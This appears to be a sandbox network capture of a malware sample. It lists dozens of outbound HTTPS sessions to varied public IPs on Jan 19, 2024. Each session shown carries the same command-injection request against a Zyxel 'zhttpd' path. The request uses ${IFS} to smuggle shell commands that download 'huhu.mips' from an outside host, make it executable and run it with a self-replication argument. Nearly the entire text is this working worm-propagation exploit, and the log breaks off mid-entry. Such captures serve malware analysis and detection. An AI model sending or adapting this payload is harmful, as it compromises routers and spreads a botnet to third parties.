                                      Jan 19, 2024 17:29:32.770034075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4355192.168.2.146045867.71.152.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770062923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4356192.168.2.145870276.135.167.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770093918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4357192.168.2.1445236139.158.42.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770113945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4358192.168.2.1433998123.255.233.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770138979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4359192.168.2.1441360107.243.148.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770215988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4360192.168.2.1449756221.69.92.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770271063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4361192.168.2.1440678101.229.43.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770281076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4362192.168.2.1444456178.140.127.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770328999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4363192.168.2.1435714134.85.225.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770381927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4364192.168.2.143779699.244.15.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770407915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4365192.168.2.1437010154.187.234.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770464897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4366192.168.2.144481824.132.228.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770514965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4367192.168.2.1458660206.118.31.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770545959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4368192.168.2.145548863.108.208.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770593882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4369192.168.2.145937065.166.95.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770615101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4370192.168.2.144753250.251.239.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770649910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4371192.168.2.143783632.245.125.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770701885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4372192.168.2.1456738164.104.108.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770750999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4373192.168.2.1445440101.97.212.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770791054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4374192.168.2.1436146182.214.249.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770823956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4375192.168.2.1444128148.162.238.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770880938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4376192.168.2.1452386159.14.101.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770917892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4377192.168.2.144348447.139.65.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.770936012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4378192.168.2.1451894126.64.63.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771038055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4379192.168.2.1445166211.172.176.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771058083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4380192.168.2.144097088.222.1.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771091938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4381192.168.2.1455066126.147.181.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771140099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4382192.168.2.144366012.158.251.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771156073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4383192.168.2.1449032202.183.132.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771228075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4384192.168.2.145769276.213.15.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771286964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4385192.168.2.1440130191.81.105.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771321058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4386192.168.2.144988019.45.163.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771358967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4387192.168.2.144056680.102.48.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771394014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4388192.168.2.1450586199.198.222.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771428108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4389192.168.2.144271858.186.51.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771466017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4390192.168.2.14386565.231.3.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771493912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4391192.168.2.1457832115.34.43.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771553040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4392192.168.2.146099444.0.184.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771586895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4393192.168.2.1433040114.240.40.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771639109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4394192.168.2.1460602182.135.164.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771667957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4395192.168.2.1436620139.208.105.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771704912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4396192.168.2.1439184133.189.20.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771720886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4397192.168.2.144650242.155.80.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771779060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4398192.168.2.144663266.164.0.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771811962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4399192.168.2.1433702212.39.9.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771862984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4400192.168.2.144245277.194.28.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771882057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4401192.168.2.1451320220.225.195.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771950960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4402192.168.2.144079412.25.60.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.771986961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4403192.168.2.1434438160.235.90.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772041082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4404192.168.2.144406279.245.41.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772093058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4405192.168.2.1442872189.15.63.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772124052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4406192.168.2.1439390147.111.107.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772165060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4407192.168.2.144605660.206.72.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772206068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4408192.168.2.144321042.87.157.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772219896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4409192.168.2.1449350167.194.19.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772264004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4410192.168.2.1449636147.173.220.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772294044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4411192.168.2.1458970220.179.155.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772353888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4412192.168.2.1444132153.114.104.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772412062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4413192.168.2.1443820172.158.209.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772439003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4414192.168.2.143992051.234.108.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772495985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4415192.168.2.144071443.15.70.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772531986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4416192.168.2.1446834142.221.141.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772551060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4417192.168.2.1437822154.108.80.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.772588015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4418192.168.2.1456914162.160.59.88443
                                      TimestampBytes transferredDirectionData
